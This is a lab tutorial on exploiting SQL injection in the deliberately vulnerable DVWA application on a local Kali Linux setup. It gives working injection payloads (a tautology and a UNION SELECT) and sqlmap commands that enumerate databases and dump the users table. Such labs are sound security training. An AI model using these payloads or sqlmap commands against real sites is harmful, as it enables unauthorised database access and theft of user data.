In this project, you will learn how to exploit SQL injection vulnerabilities using the Damn Vulnerable Web Application (DVWA) on Kali Linux. SQL injection is a common attack vector that can be used to manipulate databases and extract sensitive information. By the end of this project, you will be able to identify and exploit SQL injection vulnerabilities and understand how to secure databases against such attacks.
- Basic understanding of web application and database concepts.
- Familiarity with using the command line interface (CLI).
- Basic knowledge of SQL and web security principles.
Here is a simple network diagram for this lab setup:
+------------------+ +------------------+ | Attacker | | Vulnerable Web | | Kali Machine |<----->| Application | | (192.168.1.100) | | (DVWA) | +------------------+ | (192.168.1.101) | +------------------+
- Kali Linux: A Debian-derived Linux distribution designed for digital forensics and penetration testing.
- DVWA (Damn Vulnerable Web Application): A deliberately vulnerable web application.
- MySQL: Database management system used by DVWA.
- Burp Suite: An integrated platform for performing security testing of web applications (pre-installed on Kali Linux).
- Clone the DVWA repository:
git clone https://github.com/digininja/DVWA- Navigate to the DVWA directory and copy the configuration file:
cd DVWA
cp config/config.inc.php.dist config/config.inc.php
- Start the MySQL service and create a database for DVWA:
sudo service mysql start
sudo mysql -u root -p
CREATE DATABASE dvwa;
exit;
- Start the Apache service:
sudo service apache2 start
- Open DVWA in your web browser at http://localhost/DVWA/setup.php and click on "Create / Reset Database".
Step1: Open DVWA in your web browser at http://localhost/DVWA/login.php. Step2: Log in with the default credentials (admin/password). Step3: Navigate to the DVWA Security page and set the security level to "Low". Expected Output: DVWA security level should be set to "Low", making it vulnerable to SQL injection.
Step1: Navigate to the SQL Injection page in DVWA. Step2: In the input field, enter:
' OR '1'='1Step3: Click "Submit" and observe the results. Expected Output: The application should return all entries in the database, indicating a successful SQL injection.
Step1: Modify the SQL injection payload to extract data from the database. For example:
' UNION SELECT user(), database(), version() --Step2: Click "Submit" and observe the results. Expected Output: The application should display the database user, name, and version information.
Step1: Open a terminal on your Kali Linux machine. Step2: Use SQLMap to automate the SQL injection process. Replace http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit with the actual URL:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=<your-session-id>" --dbsExpected Output: SQLMap should list all databases available on the server.
Step1: Use SQLMap to extract tables from the target database. Replace dvwa with the target database name:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=<your-session-id>" -D dvwa --tablesStep2: Extract data from a specific table (e.g., users):
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=<your-session-id>" -D dvwa -T users --dumpExpected Output: SQLMap should display the contents of the users table.
DVWA Documentation Kali Linux Documentation OWASP SQL Injection Prevention Cheat Sheet SQLMap Documentation
This project will help you understand how to exploit SQL injection vulnerabilities and secure databases against such attacks using DVWA on Kali Linux, enhancing your skills in web security and database protection.